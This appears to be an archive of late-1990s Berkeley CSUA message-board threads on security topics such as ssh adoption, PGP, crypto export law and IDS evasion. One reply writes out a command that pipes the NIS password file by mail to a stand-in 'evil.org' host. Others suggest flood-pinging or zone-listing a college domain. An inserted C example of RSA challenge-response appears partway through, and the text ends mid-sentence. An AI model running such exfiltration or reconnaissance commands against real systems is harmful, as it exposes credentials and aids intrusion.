        \_ DataFellows ships an sftp but it's just making an ssh tunnel
           to the ftp-cmd channel for you to use.  It only secures the
           command channel and requires that you have some account on the
           remote machine.  Due to the design of the ftp protocol, it
           is difficult to secure the data channel, though there are ways to
           do this that involve a bit of work on the part of an administrator.
           --jon
           \_ I'm sure you could just write a little script called sftp that
              would establish a secure channel and tunnel ftp automatically.
              \_ no, you can not do it with a simple shell script for
                 the data channel.  The command channel is simple, data is
                 not with most of the unix ftp clients available.
              \_ in many cases, you need to hack the ftp client from source
                 (or edit raw binary for the truly fooful) to get it to
                 use arbitrary host:port's for the data channel (you need to
                 use ftp's passive mode btw).  There is a way to combine both
                 the data and command channel for easier forwarding through
                 a novel use of a socks proxy.  This is the "bit of work" to
                 which I earlier referred.  --jon
                 \_ Most people only really care about securing the command
                    channel because of the password.  If you were working
                    on something top secret, however, that would be a diff
                    story and you should just use the inconvenient scp.
                 \_ How about:
                    ssh -f -L 1234:csua.berkeley.edu:23 csua.berkeley.edu \
                       sleep 20 </dev/null >/dev/null
                    as adapted from the fetchmail manpage?
           \_ What about writing an expect script to transfer files using
              ssh?  For example, if I want to get a file to my machine
              from soda I can do:
              ssh soda -C cat filenameOnSoda > fileNameOnMyMachine
              You can use the same trick to send a file.  You could
              write a script that would also let you do ls and other
              stuff too.  -emin
              \_ the nice thing about a "secure ftp" is that you
                 amortize the cost of the SSH authentication process
                 over the transfer time of a number of files rather
                 than once for each file transferred, and yet you
                 can still deal with files on a individual, interactive
                 basis.  Doing ls via another ssh-wrapper would just
                 add to the number of ssh-authentications needed, which
                 for some users is a high cost.  --jon
        \_ Try SRP. It provides a secure ftp and ftpd, along with a few other
           cool security features.
                \_ Can someone who has looked at SRP explain what it is about?
1999/3/10-11 [Computer/SW/Security] UID:15574 Activity:very high
3/9     Given all the network sniffing that goes on, how about turning off
        telnet and rlogin on soda and force everybody to use ssh?  I think
        the cost of dealing with ssh problems outweighs the consequences of
        a break-in.  What do you guys think?
        \_ no ssh installed on UCB dialup CLI connections
           \_ I honestly have to wonder how many people still use CLI
              from the annexen.  --sowings
              \_ All the lazy people who don't want to bother to setup ppp.
        \_ Discriminates against our non-US-citizen members who we legally
           aren't allowed to let use ssh/sshd.  (Stupid US goverment fucknuts)
           \_ sshh...you don't want to make fun of the US govt. They might
              be watching the motd and confiscate soda.
           \_ You're wrong; the most popular implementations of SSH for all
              major platforms (Windows/Mac/Unix) are developed and sold
              outside of the US.  The US is starting to lag, not lead, in
              crypto software, because of crypto export laws.
                \_ So.  That has nothing to do with the CSUA violating the
                   law everytime it allows a non-citizen to use encryption
                   software - even if they downloaded ssh on their own, it's
                   useless without the sshd software running on soda.
           \_ I know of a supercomputer center run by the government and
              foreign users connecting to that system MUST use ssh.
              If it's OK for them, it's probably OK for soda.  --peterM
        \_ There is no free SSH client for Windoze, to my knowledge
           -muchandr
           \_ http://www.zip.com.au/~roca/ttssh.html --dim
           \_ F-Secure SSH seems to be free as well.
                \_ only for 30 day trial
           \_ Then you should look at http://www.net.lut.ac.uk/psst
                and learn much...
           \_ http://www.ocf.berkeley.edu/~tee/ssh
        \_ who cares?
                \-I think this is an insane idea. I dont want to type
                my ssh key into an sshd on a machine run by people i dont
                know and i dont trust ... and I would rather not set up a
                "low security" ssh key in addition to my regular one.
                given all the network sniffing that goes on, use rhosts
                and dont trust soda on machines you care about.
                What are you going to do about the XDM machines?
                I disagree with your cost-benefit analysis. The cost of a
                compromised passwd isnt that high. The cost of a compromised
                ssh key is high. For one thing, the hacker can hide from IDS
                systems. I wont go on any more. It was reasonable to float
                this balloon, but crazy to jump on it. --partha "i watch the
                net" banerjee
                \_ you never ever type your ssh-passphrase to
                   a remote process.  the remote sshd, when you use
                   RSAAuthentication, provides you a challenge to which you
                   respond.  That response is the equivalent  of doing an
                   RSA encrypt with your private key which the remote
                   sshd tries to decrypt with the public key you deposited
                   on the remote host earlier.  If what the remote sshd
                   obtained by decrypting your response  with your public
                   key and the original challenge coincide, then you
                   are authenticated.  Of course, if you do not trust
                   RSA, and think someone may use your public key to obtain
                   your private key and the passphrase you use to further
                   protect it against local machine attacks, that's another
                   story. --jon
                \_ Oh great psb, please sniff my network in a sexual way.
                                -psb #1 fan
                   \_ Poser.   The real -psb #1 Fan
                \_ Uh, partha, you do realize that you don't need to use
                   RSA authentication to still get most of the benefits
                   of ssh.
                        \- yes but realistically you see more trojaned
                        clients and daemons than seq number or spoof attacks.
                        my point was this imposes a reasonable cost for people
                        who log in from a lot of different machines.
                        \_ It would be pretty obvious if you had logged into
                           a trojaned sshd server. In addition to the server
                           authenticating you the client also authenticates
                           the server and spews a nasty message if the
                           authentication fails.
                        \_ What do seq number or spoof attacks matter?  The
                           attacks we see daily on campus are packet sniffers.
                           ssh eliminates the threat of packet sniffing
                           script kiddies, whether or not you use RSA
                           authentication.  -tom
                           \_ I think he is saying that he believes one is
                              better off using rlogin and .rhosts as
                              attacks spoofing a connection from a
                              trusted host or attempting to hijack your
                              connection are rarer than trojan attacks.
                                --sky
                  \_ Do you passively sniff traffic or do you run the IDS
                  on a gateway and dynamically block packets?  If you are
                  just passively watching the traffic, until TCP/IP
                  stacks are standardized, your IDS can be circumvented 7
                  ways to sunday.  It's so easy to inject packets that will put
                  the IDS and the target host's stack in inconsistent states.
                  How do you deal with something as simple as TTL?  --sky "i
                  0wn j0r n3t w1th my 31337++ hAx0r sk1LLz" king
                        \-the TTL problem is in fact tricky and really
                basically intractable. i think we are cleverer than you
                think. i cant discuss exactly what we do, but if you have
                some attack based on ttls or fragmentation or whatever,
                anything stealthy, as opposed to a flood/DoS, we would be
                interested in talking to you to see if you can evade our
                monitor. the commercial monitor cos are just interested in
                profit maximizing ... so if it would take a huge effort
                to fix something and lacking that one thing isnt hurting
                their sales much, then they wont fix it. for example a major
                IDS which will remain nameless only keeps 3minutes of "state",
                which means if you just control-z a connection for 3min, you
                have probably evaded the monitor. anyway, if you are serious
                drop us a note. i am not going to publicly comment on the
                non-passive part of the monitoring. --psb
                \_ Yeah.  We have a whole library of scripts written
                   in a custom language for sending and receiving raw
                   net traffic that we use for OS fingerprinting,
                   firewall penetration testing, and IDS circumvention.
                   We have a collection of scripts whose purpose is to
                   exploit discrepancies in stack implementation so that
                   the IDS and the target systems state become disjoint,
                   allowing us to insert evil data w/o the IDS detecting it.
                   It would be interesting to see how BRO handles under
                   these conditions.  --sky
                \_ "non-passive": guys in full-length black Kevlar suits
                   with BIG GUNS
                        \-that's "big *fucking* guns" to you. --psb
                \_ Um, this whole conversation has me completely lost.
                   Any sources to strengthen my security/network fu?
        \_ How about just forcing telnetd/rlogind users to use one-time
           passwords until they can be elite enuf to use some kind of encrypted
           login system?
                \_Is using ssh w/o sshd a waste of time?
                  \_ sshd is the server; ssh is the client.. they're pretty
                     useless without each other.  You probably meant
                     "w/o ssh-agent" And no, ssh is still useful without
                     ssh-agent, whatever psb might think about the impossibility
                     of ssh password authentication --dbushong
                        \-i dont even know what "the impossibility of ssh
                        passwd authentication means". the only thing i said
                        was close if not actually impossible was for a passive
                        monitor upstream from a destination host to replicate
                        the stream it would see if it were in a different
                        point in "net space". aka "the TTL attack". --psb
                  \_ some silly places have ssh set up to automatically call
                     rlogin when the target host is not running sshd.  this
                     is a completely useless way to run ssh, and might
                     screw you one day when you're tired and not noticing that
                     this time your connection is not encrypted.
                     \_ You implied in your original post that you need to
                        generate an ssh key in order to use ssh, which is not
                        true.  --dbushong
                        \-BTW, is anyone familiar with the stuff at
                        <DEAD>srp.stanfraud.edu<DEAD>? --psb
                        \_ Yes.  mconst was thinking of patching it into
                           ssh one of these days.  --dbushong
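The challenge-response exchange as jon describes it in the thread above, as an added example (not code from the thread or from any ssh implementation). The key pair is a constructed toy (n = 61 * 53) and the function names are hypothetical; it shows that only the response crosses the wire, never the private exponent or a passphrase, and that a response is tied to one challenge.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed toy keys: n = 61 * 53 = 3233, e * d = 1 (mod 3120).
 * Numbers this small and unpadded RSA are for illustration only. */
typedef struct { uint64_t n, e; } pubkey;   /* deposited on the server */
typedef struct { uint64_t n, d; } privkey;  /* stays on the client     */

static const pubkey  DEMO_PUB   = { 3233, 17 };
static const privkey DEMO_PRIV  = { 3233, 2753 };
static const privkey WRONG_PRIV = { 3233, 2754 };  /* someone without d */

/* Square-and-multiply modular exponentiation.  Requires mod < 2^32 so
 * that the intermediate products fit in 64 bits. */
uint64_t modpow(uint64_t base, uint64_t exp, uint64_t mod)
{
    uint64_t result = 1 % mod;

    base %= mod;
    while (exp) {
        if (exp & 1)
            result = result * base % mod;
        base = base * base % mod;
        exp >>= 1;
    }
    return result;
}

/* Client side: apply the private exponent to the server's challenge.
 * The return value is the only thing sent back over the network. */
uint64_t client_respond(const privkey *k, uint64_t challenge)
{
    return modpow(challenge, k->d, k->n);
}

/* Server side: undo the response with the stored public key and compare
 * it with the challenge that was issued.  Challenges 0 and 1 are refused
 * because any exponent maps them to themselves, so they prove nothing. */
int server_verify(const pubkey *k, uint64_t challenge, uint64_t response)
{
    if (challenge < 2 || challenge >= k->n)
        return 0;
    return modpow(response, k->e, k->n) == challenge;
}

int main(void)
{
    uint64_t challenge = 1234;          /* constructed; a server picks it at random */
    uint64_t good = client_respond(&DEMO_PRIV, challenge);
    uint64_t bad  = client_respond(&WRONG_PRIV, challenge);

    printf("response on the wire : %llu\n", (unsigned long long)good);
    printf("holder of d accepted : %d\n", server_verify(&DEMO_PUB, challenge, good));
    printf("wrong key accepted   : %d\n", server_verify(&DEMO_PUB, challenge, bad));
    /* A sniffed response replayed against a fresh challenge fails. */
    printf("replay accepted      : %d\n", server_verify(&DEMO_PUB, 2000, good));
    return 0;
}
```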
1999/2/24 [Computer/SW/Security] UID:15469 Activity:nil
2/23    HELP TURN BAY BRIDGE FRAUD ON ITS HEAD!!!!
            One-click E-Z activism:
                <DEAD>users.lanminds.com/~jmeggs/baybridge.html<DEAD>
            Cool editorial in SF Chronicle today:
                http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/02/23/ED54484.DTL
1999/2/19-21 [Computer/SW/Security] UID:15449 Activity:low
2/19    Don't buy from Site For Sore Eyes.  Besides being incompetent,
        overpriced, and complete liars ("Your insurance will cover it."),
        their service sucks and their warranty is virtually useless.
        \_ Try "For Eyes".  Prices are fairly reasonable and service is
           very friendly.  They also have a good warranty on their stuff.
        \_ "For Eyes" will also fix your b0rken eyewear free of charge
                even if you didn't buy it there...if it can be fixed.
1999/2/1-2 [Computer/SW/Security, Recreation/Media] UID:15340 Activity:low
2/1     http://www.infobeat.com/stories/cgi/story.cgi?id=2558287745-883
        At&t phone service over cable tv cables.
        \_ would you trust people who can't even keep up their own web site?
           and who can't promise a representative will get back to you
           sooner than "sometime in the next 24 hours"?
1999/1/28-29 [Computer/SW/Security] UID:15310 Activity:moderate
1/27    Why isn't biff working? Why isn't comsat running?
        \_ because comsat is a stupid idea and a security hole.
                \_ What kind of security holes exist? Can't we just use
                   pam.d to block all comsat access EXCEPT 127.0.0.1?
                \_ root compromises from 127.0.0.1 are still root compromises.
        \_ just run philbiff +lots, its much coooler. -ERic
        \_ use "newmail"
        \_ Procmail and a few lines of perl works better.
1999/1/26-29 [Computer/SW/Security] UID:15296 Activity:kinda low
1/26    Is it possible to SSH out through a firewall to, say, soda?  For
        some reason, my connection keeps timing out.
        \_ depends on the firewall and the ssh installation.
        \_ try ssh -v, ssh -P, and ssh -v -P
        \_ Is it possible they blocked outgoing connections.  As the above
           said, it depends.

              __
             /  \
            / ..|\
           (_\  |_)
           /  \@' Woof!  Damn your mom was good.
          /     \
      _  /  `   |
     \\/  \  | _\
      \   /_ || \\_
       \____)|_) \_)

        \_ stay! good doggie.

              __
             /  \
            / ..|\
           (_\  |_)
           /  \@'
          /     \
      _  /  `   |
     \\/  \  | _\
      \   /_ || \\_
       \____)|_) \_)
1999/1/21-23 [Computer/SW/Security] UID:15276 Activity:nil
1/21    Rewling ssh/telnet client for winblows...
        http://www.vandyke.com
        \_ Better ssh/telnet client for windows, and this one's free:
           http://www.zip.com.au/~roca/ttssh.html
1999/1/17-18 [Computer/SW/Security] UID:15246 Activity:kinda low
1/15    Two sys admin questions:
        1) How do I disable EXPN in sendmail 8.8.7?
        2) Is ssh 1.1 client compatible with ssh 2.0 server?
           \_ i think you need to install the old sshd and then tell ssh2d
              to accept ssh connections using sshd rather than ssh2d.  The
              protocols are different and hence are not compatible.
        \_ bang yourself on the head with a ball-peen hammer until you
           get over this stupid idea that you should disable EXPN.  -tom
1999/1/14-17 [Computer/SW/Security] UID:15232 Activity:high
1/13    Irish lassie makes encryption breakthrough:
        URL:  http://www.msnbc.com/news/231690.asp
        \_ Who cares?  The only people who use encryption are pinko commies
           and perverts with something to hide . . . and dirty foreigners.
           It's no surprise that a foreigner came up with this.  I wouldn't
           be surprised if she turns out to be a commie.
           \_ Gee.  If that 16-year-old girl were a Cal student instead,
              would you guys say the same thing?
              \_ It would depend on whether or not she was a hottie.
                \_ She was rather plain but I'm sure soda geeks would be all
                   over her.
        \_ Has it been subjected to any serious peer review?  Bruce
           Schneier points out that smart people are wont to invent bad
           ciphers when they ignore peer review...
           \_ It was submitted to a school science fair.  (or fare? wtf is the
              online dictionary?)
              \_ /csua/bin/webster
        \_ I would be really interested to see an alternative crypto
           algorithm that is "10 times faster than RSA".  Unfortunately
           the most technical detail provided by the URL is that she used
           2x2 matrices.
        \_ Is there a philcrypt?  I'll bet that Phillip could kick her
           ass without even trying . . .
                \_ cnn reported that an unknown American student known only
                   as "Phillip" appeared at her home in Ireland and kicked
                   her ass.  Witnesses reported that he didn't even work up
                   a sweat.
        \_ There's better info at:
                http://slashdot.org/comments.pl?sid=99/01/13/0931237&cid=500
           Summary: no big deal
        \_ How long does it currently take to encrypt one piece of email?
           If it only takes 1ms or so, it isn't a big deal even if it's ten
           times faster, right?  How many pieces of email can you send in
           one second?
           \_ Currently, public-key encryption is too slow to use even for
              email -- that's why programs like pgp encrypt your mail using
              ordinary private-key encryption, and then use RSA to encrypt
              the key.
              \_ So how slow is it?  Say for a 10KB text email that someone
                 types up, approximately how long does it take?
           \_ How about a 30GB file?  Or a few terabytes?  With the rise in
              ecommerce and the movement of large amounts of financial data
              on the net, this is a serious possibility for a large corp. or
              a government.  Could also be plans for that new jet fighter. A
              marketing campaign.  Or the Pres. ordering a hit on a foreign
              national.  Smaller delays are always a good thing if the cost
              is zero.
        \_ If it's even only "as good as" existing methods, it would be
           a great thing, seeing as how
           1. It is OUTSIDE the US
           2. it is not patent or copyright protected.
           \_ My impression was that her "method" was just a speedup
                to RSA, which would mean that you still have to pay
                RSA to use it.
                \_ I read some pseudo tech stuff from the MIT guys she worked
                   for and ripped off the core ideas from.  It isn't RSA.
                        \_ Can you give a URL, please?
1999/1/13 [Computer/SW/Security] UID:15221 Activity:nil
1/12    Can someone point out the URL to download SSH server? Thanks.
        \_ http://www.yahoo.com
        \_ www.ssh.fi           -nolram
1999/1/12 [Computer/SW/Security] UID:15212 Activity:high
1/11    Anybody know of environmental organizations that needs volunteers
        to plant trees year round, and not just on arbor day?  I want to
        volunteer for such an organization. Any web site or other pointer
        would be greatly appreciated.
        \_ <DEAD>www.treehuggers.org<DEAD>
                \_ <DEAD>www.treehugginghippies.com<DEAD>
        \_ Friends of the Urban Forest do it here in SF: http://www.fuf.net -ausman
        \_ there's going to be an International Volunteer Conference on Feb 6,7
           I'm sure they'd have info on tree volunteer stuff.    --sly
            From: Cal Corps Public Service Center <ccorps@uclink4.berkeley.edu>
            Community Service Around the World Conference and Expo
            February 6 & 7, 1999

            Register early or at the door on February 6th. To preregister,
            email conference@lafetra.org and request registration
            information.

            EVENT LOCATION
            MLK Student Union Building, corner of Bancroft and
            Telegraph on the UC Berkeley Campus

            URL: http://uga.berkeley.edu/calcorps
        \_ Thank you all for the pointers!
1999/1/7-10 [Computer/SW/Security] UID:15183 Activity:high
1/6     Is there a mail program on a unix machine (say, soda) that uses
        pgp automatically when you read a mail in a mailbox file.
                \_ the latest versions of elm do
                   \_ How?  Can't find mention of pgp in man elm.
        \_ Why, do you fear the power of root cow?
        \_ modify the sending-filters entry under pine.
        \_ You could easily write a program to watch your mail file for
           changes, and encrypt it to a new file when it does change.
           In fact you could just hack up biff to do it!
           And if you are root, then just hack your incoming mail program,
           not that hard.
           \_ My hacking fu is weak.  Is there a way to use pgp
                within pine?  I just want to do pgp message-wise like
                some MIME encoding.  BTW, what does pgpdecode and pgpencrypt
                do?  Can't man them.
                \_ sigh. do this:
                  "pgp -kg"
                  "elm"
                  The rest is self-documenting.
                  Oops. After you set your o)ptions to be an intermediate
                  instead of beginning user in elm, that is.
        \_ What is up w/ PGP for UNIX anyway.  How come for Windows & Mac,
           you can get PGP6, w/ 4096-bit keys, but UNIX world continues
           to plod along w/ 2.6.2 w/1024-bit keys.
           http://www.pgpi.com for latest versions.
           \_ I think the only difference is the key generator.  Just use
              the inferior OS version to generate your 4096 bit key but
              use pgpi to actually send and receive.
                \_ mutt has much better pgp support than elm.  -tom
                   \_ but i like elm better
                      \_ you lose  the popularity contest,
                                   but win a better mailreader
1999/1/6-7 [Computer/Networking, Computer/SW/Security, Computer/SW/Unix] UID:15181 Activity:nil
1/6     Let's say I do a "netstat -a" and see someone is hogging up a port
        that I need (ie. I'm running a MUD server). As a root, how do I
        delete the process that is associated with that port? Thanks.
        \_ use lsof to get the pid of the process that is using
           the port.
1999/1/6 [Computer/SW/Security] UID:15180 Activity:nil
1/6     Oh, I'll be darned. Say hello to Tawei Liao:
        % netstat -a | grep tawei
        f4b47800 stream      0    f48ee680 0 /tmp/ssh-tawei/agent-socket-8677
1999/1/6 [Computer/SW/Security, Academia/StanfUrd] UID:15177 Activity:nil
1/5     From http://www.finjan.com/wsj2.cfm about the Excel security hole:
        "We think this is probably the biggest security hole in Internet
        history," said Bill Lyons, Finjan's chief executive officer. "Any
        student at Stanford could exploit it."

        Yup!  Only M$ is dumb enough to have created such a huge security
        hole that even Stanfurd students can exploit it. :-)
1998/12/30-31 [Computer/SW/Security] UID:15146 Activity:kinda low
12/28   Help crack DES again. http:/http://www.distributed.net
        \_ oh boy how exciting.  Get a fucking life.
           \_ If you don't like tech projects, don't read the soda motd.
                \_ Crunching random numbers over and over again is not
                   a tech project.  -tom
                   \_ You tell 'em Tom!  Crush their will, destroy their ego!
                      You, truly, are the only one who knows anything!  Lend
                      us a tiny fleck of your vast wisdom!
           \_ Although I think the DES cracking project is ridiculous, I don't
              see anything wrong with others participating.  It isn't as if
              these people are sitting there putting in real effort instead of
              having lives.  They just run the client and hope to get lucky
              and see their name in lights.  What's wrong with that?
              \_ Plus, hopefully the government will realize the futility of
                 their cryptography export restrictions when DES is cracked
                 in a short enough time (it's down to 2 days).
                        \_ Highly doubtful.  The previous cracking attempts
                           merely resulted in the US govt. convincing most
                           of Europe & Asia to join in the encryption export
                           stupidity, to make it harder for us to import
                           software.  (Besides, most congressmen wouldn't
                           know a DES crack from the giant holes in their
                           heads.)
        \_ It hasn't started yet, it was just announced.  It starts in
           January.
        \_ Silliness about http syntax deleted.  It was too silly even for
           the motd.
1998/12/4-6 [Computer/SW/Security] UID:15065 Activity:high
12/3    The Wassenaar agreement has been signed; approximately speaking, it
        is a treaty which will require other countries to impose US-style
        export controls on cryptography.  http://www.wassenaar.org
        \_ Damn Republicans.  They had to start this whole anti-
           cryptography crap.  I can't believe Clinton actually
           supports them too.
                \_ Going back to the clipper chip this was always a big
                   Clinton issue.
        \_ It's so ironic that the US is the only democratic government
           in the world that is so paranoid about public use of public
           key cryptography.
           \_ It's for your protection.
              \_ If owning a public key is criminal, only criminals will own
                 a public key.
              \_ Outlaw public key cryptography.  Great, now no one can
                 use pgp and ssh and people who do 'require' ssh and ssl
                 (like sysadmins) can't use them anymore.  And yes there
                 are a lot of non-government systems that do require
                 encryption.  Speaking of protection, do you think if
                 you outlaw pub key cryptography that criminals or
                 terrorists won't try to get their hands on it.  Now
                 you've just outlawed legitimate use of the technology
                 and let criminals use it.  Read up on it more and
                 you'll see why outlawing it is such a bad idea.
                 /ftp/pub/cypherpunks
                 \_ I think you are responding to a joke.
                    \_ Yes, it was a joke.  Too bad some people just don't
                       get it.  Lighten up folks.
                       \_ ah yes, that was just so hilarious i forgot to
                          laugh.
                        \_ No, you're just a friggin' idiot with no sense
                           of humor and lacking the slightest shred of what
                           might pass for intelligence at the dismal pit
                           Berkeley has become at the undergraduate level.
                           \_ tom, is that you again?  What did I tell
                              about judging other people's sense of humor
        \_ If I was a criminal and I really wanted strong encryption why
           couldn't I just code up the RSA public key cryptography algorithm?
           Granted it might take a little while but my point is that anyone
           who wants strong cryptography can write it themselves.
           Do the anti-crypto people have an argument against this?
           \_ It's not as easy as it seems to code these algorithms.  There's
              all kinds of attacks that don't necessarily involve breaking
              the underlying math.  It's definitely possible, but I think
              that it's only feasible for criminals who can hire people with
              the appropriate fu.    - mikeym
              \_ Actually, it is as easy as it seems.  The original creator
                 of PGP was Phil Zimmermann who himself was not an expert
                 on cryptography.  Nevertheless, he studied it in enough
                 and consulted enough people about any loopholes in his
                 program that he finally came up with a product that is
                 now widely used.  All from a joe schmo who graduated
                 from U.Florida with a B.S. in computer science.
                 \_ I don't think that PGP has the NSA quaking in its boots.
              \_ But the threat of public key cryptography comes not from
                 individual terrorists (I don't think Timothy McVeigh
                 used pgp) but from other countries and their military,
                 which are competent enough to implement a robust
                 cryptographic system if they wanted to without the help
                 of anyone in the US.  Which is why banning public key
                 cryptography is pointless.
                 \_ Yes, this is true, but my point was that it requires
                    more than the common criminal can do.  Not just "anyone"
                    can do it.  I would even guess that many governments would
                    have trouble outsmarting the NSA.  - mikeym
                    \_ The "common" criminal is a purse snatcher or car
                       jacker.  It's likely the only computer they ever owned
                       was the one stolen from your apartment.
                        \_ Read what I was replying to: "anyone who wants
                           strong cryptography can write it themselves."  This
                           is FALSE.  It requires a lot of knowledge and
                           intelligence.  That was my WHOLE point.  - mikeym
                           \_ You didn't have a point.
                           \_ Any moron can download and compile the
                              int'l version of PGP. And of course they
                              can keep recompiling and increasing the key size
                              (for use amongst themselves) forever.
                                \_ PGP is the height of security?
                                   \_ It's "pretty good", no more, no less.
              \_ So it is not a technical problem but a money one? -jon
1998/11/23-1999/2/2 [Computer/SW/Security] UID:15002 Activity:nil 58%like:14964
11/15   Learn to use ssh -- read "/csua/adm/doc/ssh-howto". -brg
1998/11/19 [Recreation/Computer/Games, Computer/SW/Security] UID:14981 Activity:nil
11/19   http://www.gamecenter.com/Reviews/Item/0,6,0-2289,00.html?st.gc.fd.gca
        \_ Oh. My. God.
1998/11/15-23 [Computer/SW/Security] UID:14964 Activity:nil 58%like:15002
11/15   Dealing with people who get their passwords sniffed is a waste of the
        CSUA's time. Learn to use ssh -- read "/csua/adm/doc/ssh-howto". -brg
1998/11/14-16 [Computer/SW/Security, Computer/SW/Unix] UID:14955 Activity:nil
11/13  What's up with the following? just a routine passwd change...

        soda.CSUA.Berkeley.EDU% passwd
        Error: /dev/d0f3 Failure level 2
        \_ This means they just posted your password & login to the net.
1998/11/14-16 [Computer/SW/Security] UID:14954 Activity:moderate
11/13   I have a text file that I want to have a legally admissible time stamp.
        This should be easy with some type of public key.  Is there a service
        like that?
        \_ I don't think there exists any such electronic notary service.
           If the recipient trusts you then you yourself can put a time
           stamp on the text file and then you can use pgps to sign it.
           Therefore your recipient knows that there's only one person
           that can meddle around with the time stamp.
           \_ There is no specific recipient --- it's not an email message.
                I just need to prove that I created it on some specific day.
        \_ print it out and take it to a notary.
           \_ Is there no electronic/"hi tech" way to do it?
              \_ case law too new, risky to do it high tech unless you are
                 Novell/MS/etc. and have $ lawyers - do it old-fashioned way
1998/11/13-16 [Computer/SW/Security] UID:14952 Activity:nil
11/13   How do people deal with pgp under multiple accounts?  Do they
        simply recreate a new key all together or do they use the same one?
        Also, if you change things like your email address or passphrase
        do you have to redistribute your public key all over again or
        can your correspondents use the same key.  thx. --pgp hozer
                \_ Is that you, mark?
1998/11/13-16 [Academia/Berkeley/Classes, Computer/SW/Security] UID:14950 Activity:nil
11/12   Wow, further proof that our dorms aren't as bad as we
        thought:
        http://www.nytimes.com/library/tech/98/11/circuits/articles/12prin.html
        \_ Unit 2 Cunningham has had this since '92.
        \_ got a username/passwd for us to use?
           \_ cypherpunk/cypherpunk
           \_ just create one for yourself
           \_ It's free.  Try this:
                http://verify.nytimes.com/subscribe/sub-bin/new_sub.cgi
        \_ What's that sound?  Is that the sound of freedom being chipped
           away, bit by bit?  What's that?  It's for my safety?  Gee, thanks.
        \_ Anyone know the detection range for our prox cards?  Is it the
           ~3 cm you have to get to the readers to get them to unlock the
           door, or could they be read from a longer distance in theory?
1998/11/3-4 [Computer/SW/Security] UID:14887 Activity:high
11/3    Is the latest ssh bug really worth deinstalling it?  My friend and
        I are having an argument over this point. A URL on the subject:
        http://news.freshmeat.net/readmore?f=ssh-vulnerability  --ssh h0zer
        \_ No definitely exploitable vulnerability has been found yet
            Until one is, you're much better off using it than not
            \_ Your machine is safer with no login mechanisms, not even
               ssh.   In fact, it's even more secure if you unplug it from
               the net, unplug it from power, lock it in a safe, and bury
               that safe beneath your home
                \_ But even then your host can still be easily compromised
                   through the use of brute-force methods.  If you're really
                   concerned, the best solution is to not buy a computer at
                   all.  Go outside and enjoy the blue sky and sunshine -
                   you'll have all that extra pocket cash to take with you
                   \_ fresh air smells funny. i think i'll stay inside soda
                   \_ but then I miss out on all the cash I get from
                      cracking other peoples' ssh-guarded firewalls
            \_ IBM has specially denied the assertion that it had ever
               uncovered an exploitable bug in ssh, and is complaining
               about rootshell's unethical use of a minor advisory which
               does not appear to detail any real security threat.  So the
               people who supposedly found the bug say there is none
1998/11/2-3 [Computer/SW/Security] UID:14876 Activity:kinda low
11/2    IMAP service (finally) available on UCLink4.  See:
        http://weblink.berkeley.edu:8000/imap.html for details.
        \_ It's been there for a while, but they only just announced it.
           Has anybody tried it?
1998/10/13-15 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:14769 Activity:low
10/12   Is there a web site for the Spanish channel Ch14?  Thanks.
                \_ http://www.univision.com
                   \_ But that's a company called VisiCom which makes video
                      hardware.
1998/10/12-14 [Computer/SW/Security, Computer/SW/Unix] UID:14767 Activity:kinda low
10/12  Is it true that if a user account is compromised on a network of computers
       running NIS, the entire network of computers running NIS are compromised?
        \_ It will allow people to "ypcat passwd | mail someone@evil.org",
           which should be considered a problem.  This is probably what whoever
           said that was thinking of.
                \-well, that isnt really enough info to make any guesses but
                my guess would be "if the user can log into one NIS client,
                the login is probably valid on other clients which would need
                to be checked out". the more involved question is "if someone
                breaks root on a NIS client, what are the implications for the
                whole domain". --psb
                \_ Not "enough info to make any guesses"?  The quality of
                   users' password choices has not gotten any better over time,
                   and Crack still works (even better, now that computers are
                   faster).
                        \-i mean the poster hasnt provided enough info for an
                answer ... we cant really guess what the question means. --psb
1998/10/8-11 [Computer/SW/Security] UID:14752 Activity:kinda low
10/7    I want to use a console based ssh on my NT machine (i.e. so
        that I can run ssh in a MSDOS shell). I have found 1 program
        but that didn't have vt100 support. Any pointers?
        (Why do I want to do this? Because I want to use econsole
         and not the ugly FSecure ssh terminal).
        \_ set up a port forward for port 23 and use whatever telnet client
           you like.  -tom
                \_ But then is there a console based telnet for NT?
                   The standard telnet will pop up another window.
        \_ SecureCRT baby, worth every penny. http://www.vandyke.com
           \_ Or teraterm, also worth every penny but much cheaper.
              http://www.zip.com.au/~roca/ttssh.html
              \_ Teraterm is better than FSecure or SecureCRT, IMHO.
                 Suggested changes: turn off cursor blinking in the .ini
                 file (it's not one of the GUI configurable options), and
                 steal the font from CRT/SecureCRT as it's the one xterms
                 use and looks much nicer than your default options.  Also
                 turn off the menu.. hey.. you don't really need it  --dbushong
                        \_ But can teraterm have transparent backgrounds
                           like econsole?
                           \_ Now seems as good a time as any to ask why
                              the fuck you're running windows..  --dbushong
                           \_ It has source. therefore, if you have clue
                              and time, it can have that.
        \_ Anyone know of any Mac SSH software besides F-Secure?
          \_ NiftyTelnet SSH.
              \_ URL? --dim
                 \_ http://www.lysator.liu.se/~jonasw/freeware.html Note that
                    it's technically illegal for use in the US of A. I'm
                    actually looking forward to the SSH enabled version of
                    BetterTelnet, which is a really nice Mac telnet client, but
                    distribution of the SSH-enabled beta is on hold:
                    http://www.cstone.net/~rbraun/mac/telnet/beta/ssh.html
1998/10/3-5 [Computer/SW/Security] UID:14728 Activity:nil
10/3    Has anyone bought stuff from InDirect? They seem to have really
        cheap prices. How about Hi-Tech USA? I don't really give
        crap about customer service. I know exactly what I want
        already.
        \_ if you don't care about service then why are you asking?
1998/9/24-26 [Computer/SW/Security] UID:14665 Activity:high
9/24    How do I find out what machines are in a certain domain, e.g.
        laney.edu?  Thanks.
        \_ ping -f http://laney.edu
        \_ a little command many people forget about: host -l laney.edu
        \_ echo "What machines are in your domain?" | mail postmaster@laney.edu
           You could try to use nslookup's ls command to list everything in the
           domain, but most nameservers (including laney.edu's) won't let you.
                \-"You have to be this tall ... " ... /tmp/laney.edu --psb
           \_ you could get a map of what network addresses they use, and then
              try to get reverse dns mappings for everything in those addresses.
              This is why disabling zone transfers on a nameserver (i.e. ls)
              is pretty stupid unless you kill reverse dns too. -ERic
                \_ Disabling zone transfers stops the script kiddies for now
                   (until someone takes pity on them and writes them a script
                    to do things the hard way)
                   \_ so until then you end up making it harder on everyone
                       else.
                        \_ stupidity in the name of security is rampant.
                           See soda's relaying policy.  -tom
                        \_ most everyone else doesn't need to do a zone xfer
                           or can ask nicely for one
                           \_ Disallowing them is a security through obscurity
                              policy, and impedes curiosity.  It's like turning
                              off finger on Unix.  Besides, crackers can still
